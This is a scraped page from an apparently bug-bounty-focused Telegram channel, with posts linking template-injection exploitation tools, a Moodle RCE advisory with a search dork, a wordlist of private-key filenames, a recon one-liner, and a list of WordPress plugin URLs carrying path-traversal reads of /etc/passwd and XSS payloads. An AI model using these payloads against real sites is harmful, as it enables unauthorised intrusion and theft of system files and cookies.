Brut Security
@brutsecurity
15.3K subscribers
968 photos
76 videos
293 files
1.01K links
โœ…DM: @wtf_brut
๐Ÿ›ƒWhatsApp: https://wa.link/brutsecurity
๐ŸˆดTraining: https://brutsecurity.com
๐Ÿ“จMail: info@brutsec.com
Download Telegram
About
Blog
Apps
Platform
Join
Brut Security
15.3K subscribers
Brut Security
๐Ÿ’ก Bug Bounty Tip:
Sometimes you can easily find IDOR vulnerabilities simply by changing the request method! ๐Ÿค‘
Quick example ๐Ÿ‘‡
โค6๐Ÿ‘3๐Ÿคฃ3
3.36K viewsMr Brut
Brut Security
CVE-2024-43425: RCE in Moodle, PoC is available ๐Ÿ”ฅ๐Ÿ”ฅ๐Ÿ”ฅ

Due to incomplete sanitization in the โ€œcalculated questionsโ€ feature, attackers can transmit and execute arbitrary code, which can be used to disclose studentsโ€™ confidential information or disrupt the entire learning process.

Search at Netlas.io:
๐Ÿ‘‰ Link: https://nt.ls/6WaFx
๐Ÿ‘‰ Dork: http.headers.set_cookie:"MoodleSession"

Read more: https://blog.redteam-pentesting.de/2024/moodle-rce/
โค8๐Ÿ‘5๐Ÿคฃ1
3.44K viewsMr Brut
Brut Security
https://github.com/epinna/tplmap
3.18K viewsMr Brut, edited  
Brut Security
โ˜„๏ธTplMap - Server-Side Template Injection and Code Injection Detection and Exploitation Tool.

๐Ÿ”—https://github.com/epinna/tplmap

๐Ÿค–Join Our Discord - https://discord.gg/NTU2q8gU5K
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘4
3.11K viewsMr Brut, edited  
Brut Security
โš ๏ธ SSTImap is a penetration testing software that can check websites for Code Injection and Server-Side Template Injection vulnerabilities and exploit them, giving access to the operating system itself.

โšกhttps://github.com/vladko312/SSTImap
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ8
3.32K viewsMr Brut, edited  
Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿคฃ27๐Ÿ˜4๐Ÿ’ฏ1
3.13K viewsMr Brut
Brut Security
Presentation.pdf
3.9 MB
Deobfuscation and analysis
of client-side JavaScript code
to detect DOM-based XSS.
๐Ÿ‘7
3.3K viewsMr Brut, edited  
Brut Security
โšก๏ธAdd this .PEM files in your wordlistโšก๏ธ

minikube_test.pem
minikube.pem
test_key.pem
test_rsa_privkey.pem
test_rsa_privkey_encrypted.pem
rsakey.pem
key.pem
certificate.pem
private_key.pem
public_key.pem
privkey.pem
dhparams.pem
ios_push_certificate.pem
keycert.passwd.pem
ca1-key.pem
key-certbot.pem
key2048.pem
private.pem
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ‘7โค5๐Ÿ‘5๐Ÿ”ฅ2
3.32K viewsMr Brut
Brut Security
โšก๏ธCommand for Hidden JS Parameter Discovery.
This command takes your recon game to the next level!โšก๏ธ

cat subs.txt | (gau --threads 20 --blacklist jpg,jpeg,gif,png,tiff,ttf,otf,woff,woff2,ico,svg,pdf,txt,mp4,avi,mov,mkv,exe,zip,tar,gz,rar,7z hakrawler --depth 5 --plain --insecure waybackurls || katana -d 5 --js-crawl --auto-redirect --extensions js,json,php,aspx,asp,jsp,html,htm --proxy http://127.0.0.1:8080) | sort -u | httpx --silent --threads 200 --status-code --title --tech-detect --content-length --server | tee -a httpx_full.txt | grep -Eiv '\.(eot|jpg|jpeg|gif|css|tif|tiff|png|ttf|otf|woff|woff2|ico|svg|txt|pdf|mp4|avi|mov|mkv|exe|zip|tar|gz|rar|7z|css|doc|docx|xls|xlsx|ppt|pptx)$' | while read url; do vars=$(curl -sL $url | grep -Eo "(var |let |const |function |class |import |export )[a-zA-Z0-9_]+" | sed -e 's, "$url"', -e 's/\(var \|let \|const \|function \|class \|import \|export \)//g' | grep -Eiv '\.js$|\. [a-zA-Z0-9]+\.[a-zA-Z0-9]+$' | sed 's/$/=$FUZZ/'); echo -e "\e[1;33m$url\e[1;32m$vars"; done | tee -a js_parameters.txt
โค18๐Ÿ‘4
3.65K viewsMr Brut
Brut Security
โš ๏ธ DOMscan - Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects.
โ˜„๏ธ https://github.com/lauritzh/domscan
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - lauritzh/domscan: Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects.
Simple tool to scan a website for (DOM-based) XSS vulnerabilities and Open Redirects. - lauritzh/domscan
๐Ÿ‘1
3.2K viewsMr Brut
Brut Security
โšก๏ธWordpress Endpoints to look -
check this if you have these plugin. โšก๏ธ

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

/wp-content/plugins/dzs-videogallery/admin/upload.php

/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

/wp-content/plugins/hd-webplayer/playlist.php

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
Please open Telegram to view this post
VIEW IN TELEGRAM
๐Ÿ”ฅ10๐Ÿ‘5โค1
3.27K viewsMr Brut
Brut Security
Brut Security pinned Deleted message
Brut Security
https://www.youtube.com/watch?v=4fN4-dufirM
YouTube
"There's Nothing We Can Do..." - Amour Plastique | 1 Hour | unXstapable
๐Ÿ”๐ŸŽ€ ๐’นโ€๐“ƒ๐“‰ ๐’ป๐Ÿ’๐“‡๐‘”๐‘’๐“‰ ๐“‰โ ๐“๐’พ๐“€๐‘’ ๐’ถ๐“ƒ๐’น ๐“ˆ๐“Š๐’ท๐“ˆ๐’ธ๐“‡๐’พ๐’ท๐‘’ ๐ŸŽ€๐Ÿ”
๐’ป๐Ÿ’ฎ๐“๐“โ™ก๐“Œ ๐“‚๐‘’ ๐Ÿฉ๐“ƒ ๐’พ๐“ƒ๐“ˆ๐“‰๐’ถ๐‘”๐“‡๐’ถ๐“‚ -
/ unxstapable

You can Support me if you want :) - / unxstapable
2.87K viewsMr Brut
Brut Security
https://exploit-notes.hdks.org/
exploitnotes.org
Introduction - Exploit Notes
A security research site.
๐Ÿ‘3
2.96K viewsMr Brut
Brut Security
๐Ÿค– Join Our Discord Channel - https://discord.gg/NTU2q8gU5K ๐Ÿค–
Please open Telegram to view this post
VIEW IN TELEGRAM
2.51K viewsMr Brut
Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿšจ iphone crash alert ๐Ÿšจ
๐Ÿ”ฅ2
2.53K viewsMr Brut
Brut Security
This media is not supported in your browser
VIEW IN TELEGRAM
๐Ÿ‘3โค1
2.7K viewsMr Brut
Brut Security
A security researcher recently found that there was a bug in iOS that could lead the iPhone to crash when certain characters were typed in a sequence. If users typed โ€œโ€::โ€ followed by any fourth character into Spotlight Search or App Library could either the phone to either freeze or reboot.

https://www.thehindu.com/sci-tech/technology/new-ios-bug-causes-apple-iphone-to-crash-if-a-certain-sequence-of-characters-are-typed/article68553248.ece/amp/
The Hindu
New iOS bug causes Apple iPhone to crash if a certain sequence of characters are typed
A new bug in iOS can cause the iPhone to crash if four characters are typed in a specific sequence.
3.22K viewsMr Brut
Brut Security
๐Ÿ˜15๐Ÿ”ฅ4๐Ÿ‘2โค1
3.46K viewsMr Brut
Brut Security
IDOR_&_HTTP_Security_Headers.pdf
544.8 KB
4.16K viewsMr Brut
Brut Security
What Resources You're Looking For. Do Drop A Comment! (We Don't Share Pirated Contents)
3.03K viewsMr Brut